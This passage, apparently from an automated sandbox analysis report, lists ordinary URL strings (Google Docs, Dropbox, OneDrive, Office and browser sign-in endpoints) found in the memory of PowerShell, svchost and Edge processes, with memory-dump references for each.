00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                      Source: svchost.exe, 00000007.00000003.1461608335.000002ACDCDD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000007.00000003.1461608335.000002ACDCD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581468000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DEEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 0000001C.00000002.1661642520.000021C400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                      Source: msedge.exe, 0000001C.00000002.1661642520.000021C400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 0000001C.00000002.1661642520.000021C400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                      Source: powershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 0000001C.00000002.1661642520.000021C400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000006.00000002.1480775951.00002DF4023CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/E
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/GetCheckConnectionInfo
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/ListAccounts?json=standard
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSessionpH
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/reauth/chromeos
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/chrome/usermenu
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/kidsignin/chromeos
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/kidsignup/chromeos
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/v2/chromeos
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/windows
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/xreauth/chrome
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/encryption/unlock/desktop
                      Source: msedge.exe, 00000006.00000002.1480198323.00002DF402264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
